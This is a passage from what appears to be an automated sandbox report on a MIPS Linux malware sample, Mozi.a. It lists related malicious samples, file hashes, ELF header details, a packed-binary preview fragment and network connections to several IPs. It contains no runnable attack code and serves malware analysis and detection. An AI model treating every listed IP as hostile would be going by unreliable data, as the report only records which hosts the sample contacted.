                                                                                                                                    5VWtwrKOJbGet hashmaliciousBrowse
                                                                                                                                      Bs5fIqZapqGet hashmaliciousBrowse
                                                                                                                                        hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                                                          nCEHDEKsvvGet hashmaliciousBrowse

Domains

No context

ASN

Match           Associated Sample Name / URL                   Detection  Context
CANONICAL-ASGB  ggbMKQDdG2                                     malicious  91.189.91.42
                SecuriteInfo.com.Linux.Siggen.4218.31606.9155  malicious  91.189.91.42
                AbriuSDkeL                                     malicious  91.189.91.42
                xjmPNreY8I                                     malicious  91.189.91.42
                u7kjf23xQc                                     malicious  91.189.91.42
                nrT4coM180                                     malicious  91.189.91.42
                Fy8SpcfH79                                     malicious  91.189.91.42
                6vqWv6BFhR                                     malicious  91.189.91.42
                WaH4Q4OTzD                                     malicious  91.189.91.42
                6s4RqypN8p                                     malicious  91.189.91.42
                0vknf5ybYd                                     malicious  91.189.91.42
                sddX6Yllru                                     malicious  91.189.91.42
                8NC2CO6W0B                                     malicious  91.189.91.42
                nEzZe0JYXL                                     malicious  91.189.91.42
                D3xbHFJTIC                                     malicious  91.189.91.42
                ivgMZPUOLx                                     malicious  91.189.91.42
                5VWtwrKOJb                                     malicious  91.189.91.42
                Bs5fIqZapq                                     malicious  91.189.91.42
                hZt4RvNpGT                                     malicious  91.189.91.42
                nCEHDEKsvv                                     malicious  91.189.91.42
CANONICAL-ASGB  ggbMKQDdG2                                     malicious  91.189.91.42
                SecuriteInfo.com.Linux.Siggen.4218.31606.9155  malicious  91.189.91.42
                AbriuSDkeL                                     malicious  91.189.91.42
                xjmPNreY8I                                     malicious  91.189.91.42
                u7kjf23xQc                                     malicious  91.189.91.42
                nrT4coM180                                     malicious  91.189.91.42
                Fy8SpcfH79                                     malicious  91.189.91.42
                6vqWv6BFhR                                     malicious  91.189.91.42
                WaH4Q4OTzD                                     malicious  91.189.91.42
                6s4RqypN8p                                     malicious  91.189.91.42
                0vknf5ybYd                                     malicious  91.189.91.42
                sddX6Yllru                                     malicious  91.189.91.42
                8NC2CO6W0B                                     malicious  91.189.91.42
                nEzZe0JYXL                                     malicious  91.189.91.42
                D3xbHFJTIC                                     malicious  91.189.91.42
                ivgMZPUOLx                                     malicious  91.189.91.42
                5VWtwrKOJb                                     malicious  91.189.91.42
                Bs5fIqZapq                                     malicious  91.189.91.42
                hZt4RvNpGT                                     malicious  91.189.91.42
                nCEHDEKsvv                                     malicious  91.189.91.42
INIT7CH         ggbMKQDdG2                                     malicious  109.202.202.202
                SecuriteInfo.com.Linux.Siggen.4218.31606.9155  malicious  109.202.202.202
                AbriuSDkeL                                     malicious  109.202.202.202
                xjmPNreY8I                                     malicious  109.202.202.202
                u7kjf23xQc                                     malicious  109.202.202.202
                nrT4coM180                                     malicious  109.202.202.202
                Fy8SpcfH79                                     malicious  109.202.202.202
                6vqWv6BFhR                                     malicious  109.202.202.202
                WaH4Q4OTzD                                     malicious  109.202.202.202
                6s4RqypN8p                                     malicious  109.202.202.202
                0vknf5ybYd                                     malicious  109.202.202.202
                sddX6Yllru                                     malicious  109.202.202.202
                8NC2CO6W0B                                     malicious  109.202.202.202
                nEzZe0JYXL                                     malicious  109.202.202.202
                D3xbHFJTIC                                     malicious  109.202.202.202
                ivgMZPUOLx                                     malicious  109.202.202.202
                5VWtwrKOJb                                     malicious  109.202.202.202
                Bs5fIqZapq                                     malicious  109.202.202.202
                hZt4RvNpGT                                     malicious  109.202.202.202
                nCEHDEKsvv                                     malicious  109.202.202.202

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):6.016914162546184
TrID:
• ELF Executable and Linkable format (Linux) (4029/14) 50.16%
• ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:Mozi.a
File size:307960
MD5:e30a81d66f18f07647397d1defbad11b
SHA1:a7fd1a1d71f7f7b00886741db52c42af0c8873f1
SHA256:b7ba5aa2f8f7781d408e87b2131fa2cc9b95cdf3460f9778229398c9e851772a
SHA512:df7b274ac394ca1192019d35212b076d645e095050930a42342d32d7937b37a7981c19029ecb54d9390bd8a9ba91fb137d52e89b176891ac05809daa1a28b766
SSDEEP:6144:7O/QJHZweEL/NOjCHm7FZZncaoNsKqqfPqOJ:78QpZsKCaiaHKqoPqOJ
File Content Preview:.ELF.....................A.h...4.........4. ...(.............@...@...........................C...C...................*.*UPX!.X.....................\....|.$..ELF..........@.`....4..^h... ...(......<...@......ll.....H.W.`.t.d....dt.Q.....].M............6...

Static ELF Info

ELF header

Class:ELF32
Data:2's complement, big endian
Version:1 (current)
Machine:MIPS R3000
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x41fb68
Flags:0x1007
ELF Header Size:52
Program Header Offset:52
Program Header Size:32
Number of Program Headers:2
Section Header Offset:0
Section Header Size:40
Number of Section Headers:0
Header String Table Index:0

                                                                                                                                            Program Segments

                                                                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                            LOAD0x00x4000000x4000000x205b20x205b24.42980x5R E0x10000
                                                                                                                                            LOAD0x00x4300000x4300000x00x8ac180.00000x6RW 0x10000

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Oct 28, 2021 06:47:14.772008896 CEST  42836        443        192.168.2.23  91.189.91.43
Oct 28, 2021 06:47:15.540019989 CEST  42516        80         192.168.2.23  109.202.202.202
Oct 28, 2021 06:47:29.876302958 CEST  43928        443        192.168.2.23  91.189.91.42
Oct 28, 2021 06:47:42.164449930 CEST  42836        443        192.168.2.23  91.189.91.43
Oct 28, 2021 06:47:46.260524988 CEST  42516        80         192.168.2.23  109.202.202.202
Oct 28, 2021 06:48:10.836944103 CEST  43928        443        192.168.2.23  91.189.91.42

System Behavior

General

Start time: 06:47:10
Start date: 28/10/2021
Path: /tmp/Mozi.a
Arguments: /tmp/Mozi.a
File size: 5777432 bytes
MD5 hash: 0083f1f0e77be34ad27f849842bbb00c